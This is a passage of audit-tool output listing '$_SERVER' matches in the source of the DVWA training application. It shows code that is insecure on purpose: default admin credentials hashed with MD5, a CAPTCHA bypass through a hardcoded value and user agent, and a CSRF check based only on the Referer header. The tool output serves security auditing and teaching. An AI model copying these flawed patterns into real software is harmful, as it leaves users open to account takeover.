punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> <span class=\"token variable\">$baseUrl</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$stripPos</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/users/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO users VALUES\n<span class=\"line-number\">51:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'admin'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'admin'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'admin'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}admin.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>",
"line": 46,
"start": 41,
"end": 52,
"severity": "unknown",
"note": ""
},
{
"id": 16,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">103:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$dvwaSession</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">104:</span> }\n<span class=\"line-number\">105:</span> \n<span class=\"line-number\">106:</span> \n<span class=\"line-number\">107:</span> function <span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">108:</span> \t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'PHP_SELF'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">109:</span> }\n<span class=\"line-number\">110:</span> \n<span class=\"line-number\">111:</span> function <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">112:</span> \t<span class=\"token variable\">$dvwaSession</span> <span class=\"token operator\">=</span><span class=\"token operator\">&</span> <span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">113:</span> \treturn <span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$dvwaSession</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$dvwaSession</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">''</span><span class=\"token punctuation\">)</span> <span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 108,
"start": 103,
"end": 114,
"severity": "unknown",
"note": ""
},
{
"id": 17,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">556:</span> \n<span class=\"line-number\">557:</span> <span class=\"token variable\">$DVWAUploadsWrite</span> <span class=\"token operator\">=</span> <span class=\"token string\">'[User: '</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">get_current_user</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'] Writable folder '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$PHPUploadPath</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">': <span class=\"'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">is_writable</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$PHPUploadPath</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">'success\">Yes'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'failure\">No'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</span>'</span><span class=\"token comment\" spellcheck=\"true\">; // File Upload</span>\n<span class=\"line-number\">558:</span> <span class=\"token variable\">$DVWAPHPWrite</span> <span class=\"token operator\">=</span> <span class=\"token string\">'[User: '</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">get_current_user</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'] Writable file '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$PHPIDSPath</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">': <span class=\"'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">is_writable</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$PHPIDSPath</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">'success\">Yes'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'failure\">No'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</span>'</span><span class=\"token comment\" spellcheck=\"true\">; // PHPIDS</span>\n<span class=\"line-number\">559:</span> \n<span class=\"line-number\">560:</span> <span class=\"token variable\">$DVWAOS</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Operating system: <em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtoupper</span><span class=\"token punctuation\">(</span> substr <span class=\"token punctuation\">(</span>PHP_OS<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">3</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span><span class=\"token operator\">=</span> <span class=\"token string\">'WIN'</span> <span class=\"token operator\">?</span> <span class=\"token string\">'Windows'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'*nix'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">561:</span> <span class=\"token variable\">$SERVER_NAME</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Web Server SERVER_NAME: <em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</em>'</span><span class=\"token comment\" spellcheck=\"true\">; // CSRF</span></span>\n<span class=\"line-number\">562:</span> \n<span class=\"line-number\">563:</span> <span class=\"token variable\">$MYSQL_USER</span> <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL username: <em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_user'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">564:</span> <span class=\"token variable\">$MYSQL_PASS</span> <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL password: <em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_password'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">'******'</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'*blank*'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">565:</span> <span class=\"token variable\">$MYSQL_DB</span> <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL database: <em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_database'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">566:</span> <span class=\"token variable\">$MYSQL_SERVER</span> <span class=\"token operator\">=</span> <span class=\"token string\">'MySQL host: <em>'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_server'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</em>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 561,
"start": 556,
"end": 567,
"severity": "unknown",
"note": ""
},
{
"id": 97,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 98,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'hidd3n_valu3'</span> || <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_USER_AGENT'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token string\">'reCAPTCHA'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\treturn<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 109,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">33:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {",
"line": 28,
"start": 23,
"end": 34,
"severity": "unknown",
"note": ""
},
{
"id": 123,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 135,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 168,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 191,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/file3.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">6:</span> \t<span class=\"token operator\"><</span>div class<span class=\"token operator\">=</span>\\<span class=\"token string\">\"vulnerable_code_area\\\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>File <span class=\"token number\">3</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\tWelcome back <span class=\"token operator\"><</span>em<span class=\"token operator\">></span><span class=\"token string\">\" . dvwaCurrentUser() . \"</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">10:</span> \t\tYour IP address is<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>em<span class=\"token operator\">></span>{<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span>}<span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\"<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Forwarded for: <em>\"</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span> <span 